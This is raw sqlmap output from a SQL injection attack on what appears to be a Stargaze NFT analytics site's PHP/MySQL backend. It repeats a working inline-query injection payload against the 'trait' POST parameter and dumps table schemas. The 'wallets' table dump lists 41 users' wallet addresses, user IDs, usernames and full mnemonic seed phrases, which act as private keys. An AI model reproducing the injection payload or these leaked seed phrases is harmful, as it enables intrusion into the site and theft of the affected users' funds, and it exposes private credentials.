| stake_contract   | text        |
| staked           | text        |
| staked_to_dao    | text        |
| sys_id           | varchar(36) |
| tablename        | text        |
| tokenid          | int         |
| updated          | timestamp   |
+------------------+-------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: nfts
[200 columns]
+---------------------+--------------+
| Column              | Type         |
+---------------------+--------------+
| 1_of_1              | varchar(100) |
| _character          | text         |
| _rank               | varchar(100) |
| _token              | text         |
| chain               | varchar(100) |
| code                | varchar(100) |
| hold                | varchar(100) |
| name                | varchar(100) |
| type                | varchar(100) |
| wrapper             | text         |
| acc                 | text         |
| accessories         | text         |
| accessory           | varchar(100) |
| age                 | varchar(100) |
| alien               | varchar(100) |
| alignment           | text         |
| angel_blue          | varchar(100) |
| animated            | varchar(100) |
| apparel             | varchar(100) |
| archetype           | text         |
| arm_patch           | varchar(100) |
| armor               | varchar(100) |
| artifact            | text         |
| astronaut_suit      | varchar(100) |
| back                | varchar(100) |
| back_and_shoulder   | text         |
| back_weapon         | varchar(100) |
| back_weapons        | varchar(100) |
| backdrop            | varchar(100) |
| background          | varchar(100) |
| backgrounds         | varchar(100) |
| backlight           | varchar(100) |
| backpack            | varchar(100) |
| badness             | varchar(100) |
| base                | varchar(100) |
| battle_hardened     | varchar(100) |
| beard               | text         |
| belt                | varchar(100) |
| blaster             | varchar(100) |
| body                | varchar(100) |
| body_wear           | text         |
| brain_type          | varchar(100) |
| brains              | varchar(100) |
| bubble              | varchar(100) |
| cat                 | varchar(100) |
| character_shadow    | text         |
| cky_charm_female    | text         |
| cky_charm_male      | text         |
| class               | varchar(100) |
| cloak               | varchar(100) |
| cloaks              | varchar(100) |
| clothes             | varchar(100) |
| clothing            | varchar(100) |
| collectionid        | varchar(100) |
| cone                | text         |
| contract_address    | varchar(100) |
| costume             | varchar(100) |
| credits             | text         |
| demon               | varchar(100) |
| demon_headwear      | varchar(100) |
| denom               | varchar(40)  |
| distortion          | varchar(100) |
| dog_tags            | varchar(100) |
| dopamine            | varchar(100) |
| effect              | varchar(100) |
| evil_skelly         | varchar(100) |
| exclusive           | varchar(100) |
| expression          | varchar(100) |
| eyes                | varchar(100) |
| eyes_accessories    | varchar(100) |
| eyes_none           | varchar(100) |
| eyes_wear           | text         |
| eyewear             | varchar(100) |
| face                | varchar(100) |
| face_accessories    | text         |
| facedetail          | varchar(100) |
| featured            | varchar(100) |
| flaming             | varchar(100) |
| flavor              | text         |
| foreground          | varchar(100) |
| front               | varchar(100) |
| front_weapon        | varchar(100) |
| front_weapons       | varchar(100) |
| gear                | text         |
| gen                 | varchar(100) |
| gender              | varchar(100) |
| generation          | varchar(100) |
| glitch              | varchar(100) |
| glove               | varchar(100) |
| glow                | varchar(100) |
| goku                | varchar(100) |
| grim_reaper         | varchar(100) |
| hair                | varchar(100) |
| hairstyle           | varchar(100) |
| hand                | varchar(100) |
| hands               | varchar(100) |
| hat                 | varchar(100) |
| hat_and_more        | varchar(100) |
| hats                | text         |
| head                | varchar(100) |
| head_accessories    | text         |
| head_wear           | text         |
| headpiece           | varchar(100) |
| headwear            | varchar(100) |
| helmet              | varchar(100) |
| home                | varchar(100) |
| hunter              | text         |
| id                  | int          |
| identity_number     | text         |
| imgurl              | varchar(255) |
| in_game_perk_points | varchar(100) |
| intelligence        | varchar(100) |
| isListed            | varchar(100) |
| item                | varchar(100) |
| jar_bottom          | varchar(100) |
| jar_glass           | varchar(100) |
| jedi                | varchar(100) |
| laser_eyes          | varchar(100) |
| lastlistprice       | float        |
| lastsaleprice       | float        |
| left_hand           | varchar(100) |
| listingupdated      | varchar(100) |
| listprice           | varchar(100) |
| localimgurl         | varchar(100) |
| luck                | varchar(100) |
| main_theme          | varchar(100) |
| master_skelly       | varchar(100) |
| mouth               | varchar(100) |
| mouth_accessories   | varchar(100) |
| mouth_none          | varchar(100) |
| mouths              | varchar(100) |
| muscles             | varchar(100) |
| neck                | varchar(100) |
| necklace            | varchar(100) |
| nftrank             | int          |
| ninja_assasin       | varchar(100) |
| noise               | varchar(100) |
| nose                | varchar(100) |
| origin              | text         |
| outfit              | varchar(100) |
| pants               | varchar(100) |
| paper_color         | varchar(100) |
| paper_texture       | varchar(100) |
| perception          | varchar(100) |
| pets                | varchar(100) |
| pharaoh             | varchar(100) |
| protection          | varchar(100) |
| quadrant            | varchar(100) |
| quote               | varchar(255) |
| race                | varchar(100) |
| rankpoints          | float        |
| rarerity            | varchar(100) |
| residential_status  | text         |
| right_hand          | varchar(100) |
| robe                | text         |
| rvivor              | text         |
| samurai             | varchar(100) |
| service_medal       | varchar(100) |
| shape               | varchar(100) |
| shiny               | varchar(100) |
| shirt               | varchar(100) |
| silient_warrior     | text         |
| skin                | varchar(100) |
| skins               | varchar(100) |
| smoked              | varchar(100) |
| solar_power         | text         |
| space_helmet        | varchar(100) |
| spaceship           | varchar(100) |
| special             | text         |
| special_items       | varchar(100) |
| species             | varchar(100) |
| speed               | varchar(100) |
| spiderman           | varchar(100) |
| staff               | text         |
| stamina             | varchar(100) |
| strength            | varchar(100) |
| style               | varchar(100) |
| suit                | varchar(100) |
| team                | varchar(100) |
| tec_drone           | varchar(100) |
| teddy               | varchar(100) |
| terminator          | varchar(100) |
| thumbnail           | varchar(100) |
| tier_rank           | varchar(100) |
| tokenid             | int          |
| tools               | varchar(100) |
| topping             | text         |
| tops                | varchar(100) |
| trait_name          | varchar(100) |
| tsas                | varchar(100) |
| ttle_maria          | text         |
| ultra_rare          | text         |
| vizor               | varchar(100) |
| warriorclan         | varchar(100) |
| warriorname         | varchar(100) |
| warriortype         | varchar(100) |
| weapon              | varchar(100) |
| weapons             | text         |
| world               | varchar(100) |
| yellow_angel        | varchar(100) |
+---------------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: wallets
[9 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| address    | text         |
| balance    | decimal(9,8) |
| created    | datetime     |
| id         | int          |
| mnemonic   | text         |
| updated    | datetime     |
| userid     | text         |
| username   | text         |
| walletname | text         |
+------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: wallets
[9 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| address    | text         |
| balance    | decimal(9,8) |
| created    | datetime     |
| id         | int          |
| mnemonic   | text         |
| updated    | datetime     |
| userid     | text         |
| username   | text         |
| walletname | text         |
+------------+--------------+

Database: sganalytics
Table: wallets
[41 entries]
+-----+-----------------------------+----------------------------------------------+------------+---------------------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-------------------------------+
| id  | userid                      | address                                      | balance    | created             | updated             | mnemonic                                                                                                                                                           | username            | walletname                    |
+-----+-----------------------------+----------------------------------------------+------------+---------------------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-------------------------------+
| 3   | 880212256690950186          | stars1rjjejtnc55e98kmkgzz2d2ns0uqec9s62qgsc3 | 0.00000000 | 2023-05-14 10:28:23 | 2023-05-14 10:28:23 | profit quote vivid chunk rabbit noodle bounce keep sample autumn bean marble brave tired kind output author rebuild example depart treat duck crowd course         | PrimusCryptus       | 880212256690950186            |
| 8   | 594674047930073111          | stars1qctqfvp6nqtszeujn86utklfl4acltccfum74q | 0.00000000 | 2023-05-22 22:06:32 | 2023-05-22 22:06:32 | version uniform rice neutral immune zebra job cycle glance chat travel abandon spatial blast trumpet aim alter dune account august charge illegal corn vault       | Limari              | 594674047930073111_1684785992 |
| 11  | 861056194096660481          | stars1w082mrkwzr8q0cnr2msgc5vrurf6s5hglwwkct | 0.00000000 | 2023-06-09 10:02:14 | 2023-06-09 10:02:14 | observe misery little glow monster rug absurd deposit long uniform stamp agent token opinion crew immense people slow erupt valve release ride palace electric     | Gandalf             | 861056194096660481_1686297734 |
| 12  | 959360780522901525          | stars1yu6anc5xrcnj03stx9sey4hhmu2k2q36mw4gjs | 0.00000000 | 2023-06-16 11:36:38 | 2023-06-16 11:36:38 | grief pact armed heart infant trip glad open fall version boost female material tiny shrimp above huge during wine fame urge much drink ship                       | Mara85              | 959360780522901525_1686908198 |
| 13  | 916737045760737331          | stars155exfz0zsusj0lp5wds0c4j57jufu0rwupn2h5 | 0.00000000 | 2023-06-18 20:07:23 | 2023-06-18 20:07:23 | situate climb vibrant bid canyon buffalo such puzzle remember jump web knife match second hello stairs frame poet approve spy bench label square drink             | Gonzo748            | 916737045760737331_1687111643 |
| 14  | 752337592984404088          | stars14pv2pl35jnq4ttedu84smvqjtjee2qpt74qrp2 | 0.00000000 | 2023-06-30 01:01:58 | 2023-06-30 01:01:58 | parent sound cigar garden biology mystery give fetch stove uncle race bacon essence security float analyst blanket shoot during glide mesh narrow mammal oyster    | Karis               | 752337592984404088_1688079718 |
| 18  | 339621897618587659          | stars1apam8pkr83rpldc8t92agwggnx3avfvpn8vgej | 0.00000000 | 2023-07-15 10:52:31 | 2023-07-15 10:52:31 | arrange little shove cloth make three thank gift pyramid ribbon extra ghost grit dirt sweet mystery luggage renew spatial menu train atom decorate movie           | Cryptotron          | 339621897618587659_1689411150 |
| 19  | 903042903738286113          | stars154tx6xcrgkjtvqjfsgc8vhnc5nus5slspffyen | 0.00000000 | 2023-07-30 08:31:22 | 2023-07-30 08:31:22 | basket century sport festival report cube miss walk action crater salt jewel mushroom minimum pony tribe creek market shock column twist peasant aunt shuffle      | Shaka               | 903042903738286113            |
| 20  | 320968584786477056          | stars13s693wcgjtgvaycgh5plhzklf7amj88praq7y7 | 0.00000000 | 2023-07-30 20:55:57 | 2023-07-30 20:55:57 | mushroom laptop afford royal gauge consider luggage food dignity wrap note cream chief clinic tiny sniff grocery worth run trap laundry cash fork ask              | cyrett              | 320968584786477056            |
| 21  | 750540019428753419          | stars1w0dz9ra4pfrwgw8d7g0k8ljp83lhs3jazf33a2 | 0.00000000 | 2023-08-04 01:47:06 | 2023-08-04 01:47:06 | vapor vivid blouse post chronic peanut citizen august beyond army pepper proud genuine you cry pulse bench slogan nominee flip weekend elephant shoot interest     | exsousia            | 750540019428753419            |
| 22  | 236969887107514378          | stars1prag6f0u7u54npd3cnepdl7tw722q5senz5m2m | 0.00000000 | 2023-08-08 04:25:42 | 2023-08-08 04:25:42 | grocery below baby chapter gospel pulp high snow swing organ flee add apple soul much panda hill shiver guitar transfer ketchup cupboard scrap paddle              | musicgreg           | 236969887107514378            |
| 23  | 348290619120025600          | stars17tyem9fhz9lpx7tn8fls493fuapzgm8dpd22cg | 0.00000000 | 2023-08-08 04:29:11 | 2023-08-08 04:29:11 | flee honey fancy lend ski own floor royal awesome fog cycle coffee dawn nerve impose earn coffee silk direct midnight keep pause torch fly                         | nitego              | 348290619120025600            |
| 24  | 325675519351980032          | stars1l6eeuwz9cvspwl0p7wejcfjfe7za7nks30gkef | 0.00000000 | 2023-08-08 18:55:34 | 2023-08-08 18:55:34 | toward talk source auto cheese order battle rebuild news benefit hero sword urge melt end march turn claim mirror disease detail rural flash swim                  | heisenberg_walt     | 325675519351980032            |
| 25  | 622937494316515341          | stars1aeaz4nu8uv3dfs3jsxxhw489plz4tu0pv6pvg3 | 0.00000000 | 2023-08-08 20:08:58 | 2023-08-08 20:08:58 | wrap merit outside slot across section leg bunker satoshi rally ketchup limb dash shallow laptop update silly glue legal copper deny apology possible lazy         | falyvlad            | 622937494316515341            |
| 26  | 404312904884813825          | stars1k9knythwvcwprnqqg3wzrz2fsexf979dtsmg5k | 0.00000000 | 2023-08-08 20:12:35 | 2023-08-08 20:12:35 | sister budget multiply ramp mule interest old gym cradle author ramp response sibling liberty exist sorry domain army trust wear balcony search lizard upset       | cosmosfontein.stars | 404312904884813825            |
| 27  | 364853703506788356          | stars18q9u2gg8qfwfjpfqswnxs9fgt8wukx2q2xj049 | 0.00000000 | 2023-08-08 20:18:36 | 2023-08-08 20:18:36 | winner faith main normal senior unaware stadium clean ivory minor bomb pave cigar robust kiwi myself uncover bonus cargo face dolphin position father erase        | crypto_me           | 364853703506788356            |
| 68  | 405758141947576340          | stars1u8v3xdk803lxwvul7xw405d7c4mqsr6nrnfxpg | 0.00000000 | 2023-09-15 20:26:49 | 2023-09-15 20:26:49 | lens together shield reunion clay chronic ship gentle amount exile piece object right powder arrow acid upon fault forest foot drop group bottom silk              | NULL                | 405758141947576340            |
| 69  | 906354213213315092          | stars17uupd88rn30txdv3hecjqncums322eq7x3lzyd | 0.00000000 | 2023-10-20 16:28:07 | 2023-10-20 16:28:07 | stem glare dismiss script shrug destroy accident voyage kiss start material allow ankle guitar napkin again sock skill unfair wire debris chaos lobster length     | NULL                | 906354213213315092            |
| 70  | 949750657731153980          | stars1p9mu4klqd5rqus085ykfelh45xm7vakgz5pha8 | 0.00000000 | 2023-11-03 20:29:23 | 2023-11-03 20:29:23 | infant snake ball give attack obscure miss warrior olympic disorder announce dragon ranch gold meadow enroll wrestle chicken shed lazy plate waste water oblige    | NULL                | 949750657731153980            |
| 71  | 467307399682719744          | stars1rgpjesz5ekmzta6h23l84lgurm2r97yn3x4vpe | 0.00000000 | 2024-01-13 22:38:36 | 2024-01-13 22:38:36 | valve entry suffer lawn antenna buddy render mammal rule horror word spice empty shiver fatigue tent feature excuse aware beauty owner click giant gasp            | notavic.            | 467307399682719744            |
| 72  | 487475685644828672          | stars1petpqnxe2ux3pxa44k4fs2sknex8ujnaev7xew | 0.00000000 | 2024-02-16 08:29:10 | 2024-02-16 08:29:10 | poverty ring lake venture treat between hybrid pave soda case toast brown body rain stage crew barely any upon pet delay coral mechanic space                      | NULL                | 487475685644828672            |
| 73  | 776314494845976586          | stars17eakcwn38u0gv3m26ghx7m4cw5fm4edkl7qpa3 | 0.00000000 | 2024-02-16 18:32:19 | 2024-02-16 18:32:19 | employ vintage begin draft roof aim under salute clinic filter catch isolate sea alley diet what bachelor grace risk creek jump game infant fly                    | NULL                | 776314494845976586            |
| 74  | 527598381900496896-original | stars13yunwe5xdg6mfrrgm639e34xldswv7cagvwqu8 | 0.00000000 | 2024-03-07 18:19:43 | 2024-03-07 18:19:43 | test village bridge deal poet usage old they tired swift elite drastic year country ivory enrich creek claim kingdom bean novel awake index estate                 | NULL                | 527598381900496896            |
| 75  | 378917516522815488          | stars1p279xac3cxgw2zt7dj0p0vr8fr092q49veklvg | 0.00000000 | 2024-04-10 03:42:33 | 2024-04-10 03:42:33 | duck script pilot average inflict boss light short gossip tennis unknown sign another orbit patrol shop agree wise abstract inmate orange sleep couple armor       | NULL                | 378917516522815488            |
| 76  | 289835073258127360          | stars14mrv7y7nayuzkrj0wjp0vctkfvt56yzhkzrrag | 0.00000000 | 2024-07-12 14:34:25 | 2024-07-12 14:34:25 | scare embrace minimum winter short fault churn net kick chimney curtain spell planet hamster credit soup nice process address comic cancel alcohol certain account | NULL                | 289835073258127360            |
| 87  | 1070180508090249327         | stars1j33m72z2cascqpkxjnla8eh24np5rmwu4ac4fr | 0.00000000 | 2024-07-13 23:32:27 | 2024-07-13 23:32:27 | rely suffer gloom minute food ginger acquire boy lake abuse tongue false word pill short wife frog glimpse concert calm announce couple term sword                 | stargazelive.stars  | 1070180508090249327           |
| 88  | 340927762086887424          | stars1nzgxrzde0mjv2xa897ue4kwxaw2fepcwllzkk0 | 0.00000000 | 2024-07-26 15:34:42 | 2024-07-26 15:34:42 | able scout myself bonus swarm rigid similar trip grit sea tip method denial digital level ocean absent file carry panda purity orange neutral half                 | NULL                | 340927762086887424            |
| 89  | 1006160467481337956         | stars13kyl0gnylnneu5uldftmpz6h93t2nhh77hxczk | 0.00000000 | 2024-07-29 22:30:39 | 2024-07-29 22:30:39 | current width inmate album inhale move addict thank lawn act regret mutual special benefit carbon hire tornado can outdoor aerobic talent claw coffee canoe        | NULL                | 1006160467481337956           |
| 90  | 527598381900496896          | stars1q45cxp7etjt0rvg3lj70mq5dny8k5llw2vpa8x | 0.00000000 | 2024-07-30 05:33:38 | 2024-07-30 05:33:38 | labor tone allow cake profit boring utility artist relief nice wisdom fatigue thrive useless also valid describe amazing name police mountain giggle menu bachelor | kommanda            | 527598381900496896            |
| 92  | 395422889026781204          | stars1xlj6jxgfzr09e66zwqkhdzufck4qjv2q676zal | 0.00000000 | 2024-08-14 07:28:35 | 2024-08-14 07:28:35 | wish coral rocket path tragic salad palace warfare order empty idea promote jealous abstract range issue glimpse license sort uniform use era share broom          | NULL                | 395422889026781204            |
| 93  | 926688280186077247          | stars17mfafgwy3hr7379hhy0xfzm67jlqy724amuenf | 0.00000000 | 2024-09-13 23:17:27 | 2024-09-13 23:17:27 | focus income capital possible violin receive pluck wife canoe chat hundred fine parent across insect kite assume paddle give parrot stomach tag advance sibling    | jupiter1113         | 926688280186077247            |
| 94  | 411515177087926302          | stars1a8vxxx9cyj4fjgu84vmancudp6486wup8jgtlx | 0.00000000 | 2024-09-24 11:51:53 | 2024-09-24 11:51:53 | narrow license fine purse decline pig wash reunion deposit near together neglect aspect ticket raw vacuum garbage guide priority gossip steak punch strong bulb    | NULL                | 411515177087926302            |
| 95  | 569514408556888065          | stars1vg3mcc6x4w6ax4v93wq8ax3wc8mjtk65n9e9rv | 0.00000000 | 2024-11-15 00:15:00 | 2024-11-15 00:15:00 | tent normal napkin fitness final execute indicate notable skill palm truth gym bless security balcony orange swing pulse actor skirt build host brand predict      | NULL                | 569514408556888065            |
| 96  | 904778667782197259          | stars12uaknzky6car296kxumhvf62j3tqct8cda80ta | 0.00000000 | 2024-11-15 03:14:34 | 2024-11-15 03:14:34 | clip absent stem snake inside cram cabbage loop furnace copy weird orange remain crew gym wisdom jealous pottery net detail fox hole ethics sleep                  | NULL                | 904778667782197259            |
| 97  | 837102986538516520          | stars1kv37ppc7dn4lhwuf2t05ex0h3uu8jl23lp2xa2 | 0.00000000 | 2024-11-18 23:45:52 | 2024-11-18 23:45:52 | venture myth glove chief artist nation giant toward anger stable plate retire when blind focus basket stadium deposit light quiz street target prefer palm         | NULL                | 837102986538516520            |
| 98  | 983335543544872970          | stars1uq6rsgsa3meckphsu0nf6h6tnduw3hz22pawrz | 0.00000000 | 2024-11-22 13:11:56 | 2024-11-22 13:11:56 | carpet return cost category ribbon surround thunder genre final crime pioneer fire all alarm ensure equip awake purse burden load today decline view price         | NULL                | 983335543544872970            |
| 99  | 975485987474001931          | stars17c065hvl5kcpvk536l8uhxw3vuan0vng3sdtn9 | 0.00000000 | 2025-01-31 14:37:00 | 2025-01-31 14:37:00 | flee casual render thing drill afraid idea misery patrol polar mercy final audit misery firm master fiscal weapon guide song two chimney wait source               | NULL                | 975485987474001931            |
| 100 | quasar                      | stars1ultc4u8aes3apg8fck454yegq6t3vnkmh65t63 | 0.00000000 | 2025-03-06 03:31:36 | 2025-03-06 03:31:36 | meadow target ensure race bring fly village claim evil lawsuit tenant boy cupboard loan mandate ill valley cat file put drip sorry bag develop                     | NULL                | quasar                        |
| 101 | clayaverse                  | stars1f2afw5swh8ujw7t7t7dpg9cn9qsk9wjpg9rtkv | 0.00000000 | 2025-03-06 03:48:45 | 2025-03-06 03:48:45 | feed token cool allow smart bundle iron rely fit rely skull reveal                                                                                                 | NULL                | clayaverse                    |
| 102 | pixelchess                  | stars1l96h2dgl4walc9r0ushfec8juag5lajr64fghr | 0.00000000 | 2025-03-06 03:57:49 | 2025-03-06 03:57:49 | window romance inquiry right observe aunt pitch certain wheel abstract movie manual funny interest green base lift light frame convince frozen polar crack stairs  | NULL                | pixelchess                    |
| 103 | marketing                   | stars1ele6xjhc3m5udxmrvjz8307uj9dj387uawd9vq | 0.00000000 | 2025-03-06 04:08:18 | 2025-03-06 04:08:18 | wire solve end amused never control disagree badge twelve panther seek rookie                                                                                      | NULL                | marketing                     |
+-----+-----------------------------+----------------------------------------------+------------+---------------------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-------------------------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: subscriptions
[16 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| status          | varchar(20)  |
| collection_name | varchar(255) |
| collectionid    | varchar(255) |
| filter_query    | text         |
| id              | int          |
| notifycount     | int          |
| snipe           | int          |
| stars_address   | varchar(100) |
| start_date      | datetime     |
| tokenid         | int          |
| updated         | timestamp    |
| use_price       | varchar(20)  |
| use_tokenid     | varchar(20)  |
| use_traits      | varchar(20)  |
| userid          | varchar(255) |
| username        | varchar(255) |
+-----------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: transactions
[54 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| comment           | text         |
| name              | text         |
| owner             | text         |
| result            | text         |
| status            | varchar(30)  |
| address           | text         |
| bidder            | text         |
| bidid             | text         |
| buyer             | varchar(100) |
| collection_name   | text         |
| collectionid      | varchar(100) |
| created           | timestamp    |
| creator           | text         |
| denom             | text         |
| depositedNFTs     | text         |
| depositor         | text         |
| duration          | int          |
| expires           | text         |
| funds             | float        |
| id                | int          |
| imagenft          | text         |
| imgurl            | text         |
| indexsrc          | text         |
| instantiator      | text         |
| isDirectMint      | text         |
| lister            | varchar(100) |
| max_tickets       | int          |
| min_tickets       | int          |
| minter            | varchar(100) |
| mintfixdone       | int          |
| network_fee       | float        |
| poolid            | text         |
| price             | float        |
| priceusd          | float        |
| raffle_duration   | int          |
| raffle_start_time | int          |
| raffleid          | int          |
| recipient         | varchar(100) |
| record            | text         |
| reserve_price     | float        |
| reserve_priceusd  | float        |
| saletype          | text         |
| seller            | varchar(100) |
| sender            | varchar(100) |
| token_uri         | text         |
| tokenid           | int          |
| total_nfts        | int          |
| total_tokens      | float        |
| txhash            | varchar(100) |
| txheight          | int          |
| txtimestamp       | varchar(100) |
| txtype            | varchar(50)  |
| withdrawer        | text         |
| withdrawnNFTs     | text         |
+-------------------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: wl_words
[4 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| status  | varchar(10) |
| id      | int         |
| updated | timestamp   |
| word    | text        |
+---------+-------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: zen_bid_bot
[35 columns]
+----------------------------+-------------+
| Column                     | Type        |
+----------------------------+-------------+
| create                     | datetime    |
| status                     | varchar(20) |
| accepted_count             | int         |
| address                    | text        |
| bid_count                  | int         |
| bid_type                   | text        |
| collection_name            | text        |
| collectionid               | text        |
| currently_bidding          | varchar(10) |
| duration                   | int         |
| floor_price                | float       |
| id                         | int         |
| increment                  | float       |
| initialized                | varchar(20) |
| is_new                     | varchar(10) |
| list_margin                | int         |
| list_on_acceptance         | varchar(10) |
| max_bid_percent            | int         |
| max_bid_stars              | float       |
| notify_bid_accepted        | varchar(10) |
| notify_bid_deleted         | varchar(10) |
| notify_bid_edited          | varchar(10) |
| notify_bid_placed          | varchar(10) |
| notify_insufficient_funds  | varchar(10) |
| notify_max_percentage_high | varchar(10) |
| notify_status_changed      | varchar(10) |
| price                      | float       |
| sale_type                  | varchar(50) |
| send_notification          | varchar(5)  |
| tokenid                    | text        |
| track_floor_price          | varchar(10) |
| txcodes                    | text        |
| txhashes                   | text        |
| userid                     | text        |
| username                   | text        |
+----------------------------+-------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: zen_portal_users
[6 columns]
+-----------+-----------+
| Column    | Type      |
+-----------+-----------+
| created   | timestamp |
| id        | int       |
| lastlogin | int       |
| updated   | timestamp |
| userid    | text      |
| username  | text      |
+-----------+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
